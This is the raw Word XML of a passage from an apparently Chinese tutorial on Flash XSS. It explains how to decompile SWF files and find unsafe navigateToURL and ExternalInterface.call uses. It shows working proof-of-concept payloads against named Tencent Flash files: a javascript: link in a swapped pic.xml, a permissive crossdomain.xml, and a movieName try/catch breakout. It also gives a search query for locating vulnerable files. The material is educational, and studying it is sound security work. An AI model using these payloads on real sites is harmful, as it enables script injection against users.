        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中link就是被打开的链接。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9.但是这里存在一个问题，如果link是</w:t>
      </w:r>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"javascript:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1)"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么就可以执行JS代码了。这里的点击执行代码的效果类似于网页里的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&lt;ahref="javascript:alert(1)"&gt;点我弹出</w:t>
      </w:r>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1&lt;/a&gt;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0.基于以上基础知识，我们可以先来反编译</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一下腾讯的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FLASH文件，看看是不是上面这样的。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里我用到的反编译软件是actionscriptviewer2009</w:t>
      </w:r>
      <w:r w:rsidR="00D07ABE" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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把下载好的FLASH文件，拖到软件里，然后把AS都保存出来，保存为文本文件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06197FD6" wp14:editId="1B49DC3B">
            <wp:extent cx="5715000" cy="4514850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70" name="图片 70" descr="71.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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71.jpg">
                      <a:hlinkClick r:id="rId1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70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上图，我们可以看到AS代码具有目录结构，这种是AS3的。如果不是这样目录的样子，则是AS2的代码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由于我们要定位的是使用到link的代码。我们打开保存的as代码，进行搜索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B9292B4" wp14:editId="41130A56">
            <wp:extent cx="5715000" cy="3371850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="图片 71" descr="70.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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70.jpg">
                      <a:hlinkClick r:id="rId1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71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，当点击图片时，直接将数据里的link作为参数传递到了URLRequest中。</w:t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1.既然如此，我们把http://v.qq.com/doco/pic.xml给下载下来，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将xml文件里的&lt;link&gt;部分修改一下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2806454" wp14:editId="6295B13F">
            <wp:extent cx="5715000" cy="1962150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="图片 72" descr="72.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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72.jpg">
                      <a:hlinkClick r:id="rId1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72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2.上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传修改</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后的pic.xml到我们自己的服务器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23BDA9B6" wp14:editId="3E246D34">
            <wp:extent cx="5715000" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73" name="图片 73" descr="73.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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73.jpg">
                      <a:hlinkClick r:id="rId1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7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3.这样一来，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://imgcache.qq.com/liveportal_v1/swf/carousel.swf就会跨域加载我们的http://itsokla.duapp.com/pic.xml文件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4.既然是跨域加载，有必要说点基础知识。FLASH跨域请求的流程大致如下：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67E45AD" wp14:editId="0543B2E7">
            <wp:extent cx="5715000" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74" name="图片 74" descr="74.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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74.jpg">
                      <a:hlinkClick r:id="rId1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74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07ABE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5.因而，我们要允许来自imgcache.qq.com的FLASH文件，访问我们的xml文件才行。</w:t>
      </w:r>
    </w:p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在我们自己网站的根目录下，放置一个crossdomain.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xml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7ABE" w:rsidRPr="009C207F" w:rsidTr="00D07ABE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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9C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;?xmlversion</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>="1.0"?&gt;</w:t>
            </w:r>
          </w:p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cross-domain-policy&gt;</w:t>
            </w:r>
          </w:p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&lt;allow-access-fromdomain="*.qq.com"/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D07ABE" w:rsidRPr="009C207F" w:rsidRDefault="00D07ABE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lastRenderedPageBreak/>
              <w:t>&lt;/cross-domain-policy&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00376506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16.最后，看看我们的效果。点击图片时，触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="0037650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132EC1D" wp14:editId="6998BDBE">
            <wp:extent cx="5715000" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="75" name="图片 75" descr="75.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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75.jpg">
                      <a:hlinkClick r:id="rId1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6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75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A717C6" w:rsidRPr="009C207F" w:rsidRDefault="00A717C6" w:rsidP="00A717C6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924401" w:rsidRPr="009C207F" w:rsidRDefault="00924401" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十五节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>FlashXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>进阶</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[ExternalInterface.call</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>第一个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>]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924401" w:rsidRPr="009C207F" w:rsidRDefault="00924401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除了上一节讲到的navigateToURL/getURL之外呢，另一个经常存在XSS缺陷的as函数就是ExternalInterface.call，此函数作为FLASH与宿主页面javascript通信的接口，一般来说，有“2”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数，第一个参数为所调用js函数名，后续的其他参数则为所调用的js函数的参数。那么在参数可控的情况下，不论是第一个参数或是后续参数可控，我们均能加以利用实现XSS。本节先说一说第一个参数可控的情况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924401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924401" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先从程序员的角度说下基础知识，有时候，我们需要在FLASH里调用当前页面中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javascript函数，例如：一个简单的需求，我们要在游戏加载完成后，执行弹出1的操作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javascript代码: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alert(1)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as代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ExternalInterface.call("alert","1");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2.有的程序员就会觉得，直接弹出1太丑了吧。于是他自己写个js的函数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functionmyalert(str){</w:t>
            </w:r>
          </w:p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//显示一个漂亮的浮动层，并且把str显示在上面。</w:t>
            </w:r>
          </w:p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然后在as里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ExternalInterface.call("myalert","1");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3.又有一天，另外一个程序员觉得上面那个程序员写的东西不错，但是他的JS函数名不叫myalert，于是喊那个程序员改下as代码。于是那个程序员觉得，免得以后老是有人喊我改代码，他就将代码写成了下面这个样子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varfunc:String=root.loaderInfo.parameters.func;//接受FLASH所带的func参数</w:t>
            </w:r>
          </w:p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ExternalInterface.call(func,"1");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样一来，其他想用这个FLASH的人，不需要修改FLASH，只需要调用FLASH的时候带上参数即可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比如我的JS函数是newalert,我只需要按照下面这么调用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some.com/xxx.swf?func=newalert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上述过程提高了程序的可重用性，为开发人员带来了极大的便利，但是却是缺乏安全考虑的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攻击者可以采用以下的方式来执行自己的代码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tp://some.com/xxx.swf?func</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>function(){alert("hijack")})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为了方便理解，我们可以将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ExternalInterface.call("函数名","参数1");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看成JS里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函数名("参数1");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而FLASH里实际最后执行的JS代码，形式如下（至于下面这句哪里来的，暂时不表）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try{__flash__toXML(函数名("参数1"));}catch(e){"&lt;undefined/&gt;";}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因而函数名部分也可以写为(function(){alert("hijack")})的形式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6.上面说的是理论基础，有了这个基础，我们来看实例，就比较简单了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http://quan.qq.com/swf/swfupload.swf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7.怎么反编译，见上一篇。我们来看怎么查找缺陷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8.因为这是一个AS3.0的FLASH文件，我们首先确定FLASH是否有接受参数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as3.0接受参数的方法，所有参数存放在root.loaderInfo.parameters对象里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例如aaa.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>swf?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a=1&amp;b=2&amp;c=3,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么root.loaderInfo.parameters则等于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{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"a":1,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>"b":2,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>"c":3</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>9.我们可以定位到movieName变量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23B41E7B" wp14:editId="50022335">
            <wp:extent cx="5715000" cy="1809750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81" name="图片 81" descr="76.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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76.jpg">
                      <a:hlinkClick r:id="rId1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01" w:rsidRPr="009C207F" w:rsidRDefault="00924401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lastRenderedPageBreak/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76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出，FLASH的movieName参数，存放到了this.movieName中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0.进一步，this.movieName被带入了到了this.flashReady_Callback及其它变量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D0D8FE0" wp14:editId="0C558C99">
            <wp:extent cx="5715000" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80" name="图片 80" descr="77.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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77.jpg">
                      <a:hlinkClick r:id="rId1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01" w:rsidRPr="009C207F" w:rsidRDefault="00924401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77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this.flashReady_Callback=(("SWFUpload.instances[\""+this.movieName)+"\"].flashReady");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1.我们再进一步看看，this.flashReady_Callback被用到了哪里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48FF8599" wp14:editId="0DB52B62">
            <wp:extent cx="5715000" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="79" name="图片 79" descr="78.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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8.jpg">
                      <a:hlinkClick r:id="rId1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01" w:rsidRPr="009C207F" w:rsidRDefault="00924401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78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924401" w:rsidRPr="009C207F" w:rsidRDefault="00924401" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12.再接着看看调用this.flashReady_Callback的Simple函数是啥样子的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A4DF82F" wp14:editId="1C371C03">
            <wp:extent cx="5715000" cy="3895725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="78" name="图片 78" descr="79.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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9.jpg">
                      <a:hlinkClick r:id="rId1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01" w:rsidRPr="009C207F" w:rsidRDefault="00924401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79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，最终这个参数被放到ExternalInterface.call的第一个参数中执行了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3.是不是很激动。我们来假设一下，按下面调用FLASH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quan.qq.com/swf/swfupload.swf?movieName=aaaaaaaa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么this.flashReady_Callback就等于以下内容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SWFUpload.instances[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"aaaaaaaa"].flashReady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最终调用的是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ExternalInterface.call(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'SWFUpload.instances["aaaaaaaa"].flashReady');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4.如果我们要调用自己的JS代码，就需要构造闭合，但是你会发现有一定问题。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最多能够造成下面的模样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ExternalInterface.call('SWFUpload.instances["aaa"];functionSWFUpload(){};SWFUpload["aaa"].flashReady');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但是这样是无法正确执行的，因为SWFUpload.instances没有被定义，从而SWFUpload.instances["aaa"]会失败。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5.怎么办呢？这里就要拿出我们第5步里的知识了。我们把“函数名”换成call的第一个参数内容。变成下面的形式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try{__flash__toXML(SWFUpload.instances["aaaaaaaa"].flashReady("参数1"));}catch(e){"&lt;undefined/&gt;";}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再基于以上代码来构造，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try{__flash__toXML(SWFUpload.instances["aaa"])}catch(e){alert(1)};//"].flashReady("参数1"));}catch(e){"&lt;undefined/&gt;";}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图片解析:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924401" w:rsidRPr="009C207F" w:rsidRDefault="00924401" w:rsidP="00A15A13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93A5903" wp14:editId="1E758B3A">
            <wp:extent cx="5715000" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77" name="图片 77" descr="80.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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80.jpg">
                      <a:hlinkClick r:id="rId1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01" w:rsidRPr="009C207F" w:rsidRDefault="00924401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80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上面一行不好看懂的话，写的好看点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try{</w:t>
            </w:r>
          </w:p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ab/>
              <w:t>__flash__toXML(SWFUpload.instances["aaa"])//此行代码，因为SWFUpload未定义，出错，跳转到catch部分</w:t>
            </w:r>
          </w:p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}catch(e){</w:t>
            </w:r>
          </w:p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ab/>
              <w:t>alert(1);//这里将会被执行。</w:t>
            </w:r>
          </w:p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};</w:t>
            </w:r>
          </w:p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//"].flashReady("参数1"));}catch(e){"&lt;undefined/&gt;";}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6.最后，我们把构造的代码，放进FLASH的参数里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DA293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quan.qq.com/swf/swfupload.swf?movieName=aaa"])</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>}catch</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(e){alert(1)};//</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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成功执行alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924401" w:rsidRPr="009C207F" w:rsidRDefault="00924401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E6B0052" wp14:editId="09F811E0">
            <wp:extent cx="5715000" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="76" name="图片 76" descr="81.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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81.jpg">
                      <a:hlinkClick r:id="rId1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C6" w:rsidRPr="009C207F" w:rsidRDefault="00A717C6" w:rsidP="00A717C6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CC6932" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十六节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>FlashXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>进阶</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[ExternalInterface.call</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>第二个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>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CC6932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简要描述：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讲完ExternalInterface.call的第一个参数，我们接着</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来讲第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“2”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数，之所以2打上引号，因为call函数的原型是：call(functionName:String,...arguments):*，即后面可以有很多很多</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数，我们统称为第2个参数。有时候我们会遇到ExternalInterface.call("xxxxx","可控内容");的情况，那么这种情况下，如何构造XSS呢？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4E16C8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CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有了上一节教程的基础，这次我们直接见实例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E16C8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通过GOOGLE搜索，site</w:t>
      </w:r>
      <w:r w:rsidR="004E16C8" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:qq.comfiletype</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E16C8" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:swfinurl:xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00924401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可以找到以下FLASH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4401" w:rsidRPr="009C207F" w:rsidTr="00924401">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00924401" w:rsidRPr="009C207F" w:rsidRDefault="00924401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imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC6932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2.</w:t>
      </w:r>
      <w:r w:rsidR="00CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>借鉴</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上上节</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>教程的思路，我们可以看看http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml里是个什么内容。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0CD267D0" wp14:editId="7EE55B31">
            <wp:extent cx="5715000" cy="3152775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="90" name="图片 90" descr="82.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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82.jpg">
                      <a:hlinkClick r:id="rId1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82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3.好像看不出来是个啥用途，我们反编译FLASH文件。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3FE875B0" wp14:editId="53F7C9C3">
            <wp:extent cx="5715000" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="89" name="图片 89" descr="83.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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83.jpg">
                      <a:hlinkClick r:id="rId1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8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4.接着我们先看看是否有getURL,ExternalInterface.call之类的。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64041C19" wp14:editId="0CB6D842">
            <wp:extent cx="5715000" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="88" name="图片 88" descr="84.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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84.jpg">
                      <a:hlinkClick r:id="rId1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84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，我们搜索到的是下面这句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4E16C8" w:rsidRPr="009C207F" w:rsidTr="004E16C8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="004E16C8" w:rsidRPr="009C207F" w:rsidRDefault="004E16C8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flash.external.ExternalInterface.call("custom_menu_swf",menu_array[_local2].href);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004E16C8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那么call的第一个参数是被限定死了～，第2个参数为menu_array[_local2].href，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E16C8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果你对AS有一点了解，不难看出menu_array是一个数组，那么_local2应该就是数组的下标，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而从单词含义“菜单数组”我们不难联想到上面xml文件里的数据。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5D93020A" wp14:editId="6BC21DF6">
            <wp:extent cx="5715000" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="图片 87" descr="85.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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85.jpg">
